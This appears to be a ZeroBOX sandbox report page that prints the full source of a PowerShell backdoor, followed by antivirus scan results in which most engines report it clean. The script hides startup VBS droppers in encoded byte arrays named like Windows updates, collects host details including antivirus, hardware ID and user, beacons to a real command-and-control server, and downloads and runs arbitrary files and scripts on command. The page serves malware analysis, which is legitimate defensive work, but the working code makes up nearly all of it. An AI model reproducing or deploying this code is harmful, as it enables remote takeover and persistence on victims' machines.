popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName Microsoft.VisualBasic
$httpobj = [Microsoft.VisualBasic.Interaction]::CreateObject("Microsoft.XMLHTTP")
[String] $h = "serv01.nerdpol.ovh"
[String] $p = "7501"
$spl = "|V|"
$ErrorActionPreference = 'SilentlyContinue'
function install() {
[String] $startup = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,79,66,66,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,79,66,66,46,82,117,110,32,34,80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,34,43,34,37,70,73,76,69,37,34,44,48))
[System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + '\Windows10DecemberUpdate.vbs', $startup.Replace('%FILE%', $PSCommandPath))
function Get-AntivirusName {
[cmdletBinding()]
param (
[string]$ComputerName = "$env:computername" ,
$Credential
BEGIN
{
$wmiQuery = "SELECT * FROM AntiVirusProduct"
}
PROCESS
{
$AntivirusProduct = Get-WmiObject -Namespace "root\SecurityCenter2" -Query $wmiQuery @psboundparameters
return $AntivirusProduct.displayName
}
END {
}
Function Binary2String([String] $data) {
$byteList = [System.Collections.Generic.List[Byte]]::new()
for ($i = 0; $i -lt $data.Length; $i +=8) {
$byteList.Add([Convert]::ToByte($data.Substring($i, 8), 2))
return [System.Text.Encoding]::ASCII.GetString($byteList.ToArray())
function POST($DA, $Param) {
$ResponseText = ""
$httpobj.Open("POST", "http://" + $h + ":" + $p + "/" + $DA, $false)
$httpobj.SetRequestHeader("User-Agent:", $info)
$httpobj.Send($Param)
$ResponseText = [System.Convert]::ToString($httpobj.ResponseText)
} catch { }
return $ResponseText
function inf {
$av = Get-AntivirusName
$vr = "v2.0"
$mac = HWID($env:computername)
$id = $wormID + "" + $mac
$os = [Microsoft.VisualBasic.Strings]::Split((Get-WMIObject win32_operatingsystem).name,"|")[0] + " " + (Get-WmiObject Win32_OperatingSystem).OSArchitecture
return $id + "\" + ($env:COMPUTERNAME) + "\" + ($env:UserName) + "\" + $os + "\" + $av + "\" + "Yes" + "\" + "Yes" + "\" + "FALSE" + "\"
function HWID($strComputer) {
$ErrorActionPreference = 'SilentlyContinue'
$lol = [System.Convert]::ToString((get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID))
return ([Microsoft.VisualBasic.Strings]::Split($lol,'-')[0] + [Microsoft.VisualBasic.Strings]::Split($lol,'-')[1])
$info = inf
install
while($true)
$A = [Microsoft.VisualBasic.Strings]::Split((POST("Vre", "")) , $spl)
switch($A[0]) {
"RF" {
$TargetPath = [System.IO.Path]::GetTempPath() + $A[2]
[System.IO.File]::WriteAllBytes($TargetPath, [System.Text.Encoding]::Default.GetBytes($A[1]))
[System.Diagnostics.Process]::Start($TargetPath)
break }
"TR" {
[String] $PsFileName = [System.Guid]::NewGuid().ToString().Replace("-", "") + ".PS1"
[String] $StartupContent = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,87,115,104,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,87,115,104,83,104,101,108,108,46,82,117,110,32,34,80,111,119,101,114,115,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,70,105,108,101,32,34,32,43,32,34,37,80,84,37,34,44,32,48))
$TargetPath = [System.IO.Path]::GetTempPath() + $PsFileName
[System.IO.File]::WriteAllText($TargetPath, $A[1])
[System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + "\WinLOGON.vbs", $StartupContent.Replace("%PT%", $TargetPath))
Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File $TargetPath
#[System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + "\" + $PsFileName.Replace(".PS1", ".cmd"), "Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -File " + $TargetPath)
break }
"exc" {
$Filename = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}) + ".vbs"
$TargetPath = [System.IO.Path]::GetTempPath() + $Filename
$CurrSc = $A[1]
[System.IO.File]::WriteAllText($TargetPath, $CurrSc)
[System.Diagnostics.Process]::Start($TargetPath)
break }
"Sc" {
$TargetPath = [System.IO.Path]::GetTempPath() + $A[2]
[System.IO.File]::WriteAllText($TargetPath, $A[1])
[System.Diagnostics.Process]::Start($TargetPath)
break }
"Cl" {
[System.Environment]::Exit(0)
break }
"Un" {
[System.Environment]::Exit(0)
break }
[System.Threading.Thread]::Sleep(3000)
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/Agent.WH
TrendMicro-HouseCall Clean
Avast SNH:Script [Dropper]
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Tencent Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Clean
Emsisoft Clean
Ikarus Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit Clean
ViRobot Clean
ZoneAlarm Clean
GData Clean
AhnLab-V3 Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
MAX Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG SNH:Script [Dropper]
Panda Clean
No IRMA results available.